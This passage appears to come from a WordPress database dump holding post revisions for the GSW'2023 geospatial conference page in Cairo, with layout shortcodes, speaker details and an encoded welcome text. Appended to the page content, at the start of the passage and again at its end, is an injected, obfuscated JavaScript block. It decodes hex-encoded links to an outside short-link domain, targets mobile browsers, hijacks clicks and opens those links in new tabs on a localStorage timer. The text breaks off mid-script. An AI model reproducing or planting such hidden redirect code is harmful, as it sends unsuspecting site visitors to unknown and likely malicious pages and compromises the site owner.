_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 13:23:20','2022-10-07 13:23:20','',2167,'https://gsw2023.com/?p=2396',0,'revision','',0),
(2398,1,'2022-10-07 13:27:56','2022-10-07 13:27:56','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 